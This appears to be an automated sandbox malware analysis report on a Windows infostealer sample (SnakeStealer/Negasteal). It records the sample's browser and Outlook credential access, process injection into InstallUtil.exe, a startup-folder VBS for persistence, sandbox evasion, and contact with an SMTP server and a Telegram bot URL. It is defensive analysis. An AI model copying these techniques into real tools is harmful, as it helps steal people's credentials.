                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Queries volume information: C:\Users\user\Desktop\TtLlwb3ava.exe VolumeInformation
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Queries volume information: C:\Users\user\AppData\Roaming\Activator.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Activator.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\TtLlwb3ava.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match; File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match; File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000002.00000002.2469589164.00000000003E3000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: 11.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3cd17f0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 10.2.Activator.exe.4735fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3ab77b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.TtLlwb3ava.exe.3b05fd0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: TtLlwb3ava.exe PID: 6708, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6996, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Activator.exe PID: 7328, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 7368, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; leading digits are the report's signature-count badges for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 211 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1634734 | Sample: TtLlwb3ava.exe | Start date: 11/03/2025 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: reallyfreegeoip.org; mail.ncsp.pk; 2 other IPs or domains
  Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 9 other signatures
  Started: wscript.exe 1; TtLlwb3ava.exe 5

reallyfreegeoip.org
  Signature: Tries to detect the country of the analysis system (by using the IP)

wscript.exe
  Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: Activator.exe 2

TtLlwb3ava.exe
  Dropped: C:\Users\user\AppData\Roaming\Activator.exe, PE32; C:\Users\user\AppData\...\Activator.vbs, ASCII; C:\Users\...\Activator.exe:Zone.Identifier, ASCII
  Signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Started: InstallUtil.exe 15 2

Activator.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Writes to foreign memory regions; Injects a PE file into a foreign processes
  Started: InstallUtil.exe 2

InstallUtil.exe (started by TtLlwb3ava.exe)
  DNS/IP: checkip.dyndns.com 132.226.8.169, ports 49692, 49697, 80, UTMEMUS, United States; mail.ncsp.pk 209.182.213.250, ports 49696, 49701, 587, INMOTI-1US, United States; reallyfreegeoip.org 104.21.80.1, ports 443, 49694, 49699, CLOUDFLARENETUS, United States
  Signature: Tries to steal Mail credentials (via file / registry access)

InstallUtil.exe (started by Activator.exe)
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Submitted file:
Source | Detection | Scanner | Label
TtLlwb3ava.exe | 72% | Virustotal | 
TtLlwb3ava.exe | 79% | ReversingLabs | Win32.Spyware.Negasteal
TtLlwb3ava.exe | 100% | Avira | TR/AD.SnakeStealer.qzqju

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Activator.exe | 100% | Avira | TR/AD.SnakeStealer.qzqju
C:\Users\user\AppData\Roaming\Activator.exe | 79% | ReversingLabs | Win32.Spyware.Negasteal

No Antivirus matches
No Antivirus matches

URLs:
Source | Detection | Scanner | Label
http://mail.ncsp.pk | 0% | Avira URL Cloud | safe
http://mail.ncsp.pkd | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.ncsp.pk | 209.182.213.250 | true | false | | unknown
reallyfreegeoip.org | 104.21.80.1 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
http://checkip.dyndns.org/ | false | | high
URLs from memory and binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
https://stackoverflow.com/q/14436606/23354 | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1234437287.0000000002971000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1376773005.00000000035A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.orgd | InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.ncsp.pk | InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://mail.ncsp.pkd | InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-net | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | InstallUtil.exe, 00000002.00000002.2472513262.0000000002561000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030E4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-neti | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039D5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tools.ietf.org/html/rfc4253#section-4.2 | Activator.exe.0.dr | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189l | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.comd | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | TtLlwb3ava.exe, 00000000.00000002.1243668980.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1246874921.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.00000000045A9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/q | TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003979000.00000004.00000800.00020000.00000000.sdmp, TtLlwb3ava.exe, 00000000.00000002.1243668980.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp, Activator.exe, 0000000A.00000002.1404614295.0000000004735000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2469459435.0000000000413000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/8.46.123.189d | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://reallyfreegeoip.org | InstallUtil.exe, 00000002.00000002.2472513262.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.000000000310E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.orgd | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org/d | InstallUtil.exe, 00000002.00000002.2472513262.00000000026AB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2472513262.00000000025D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2472825182.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | false | | high
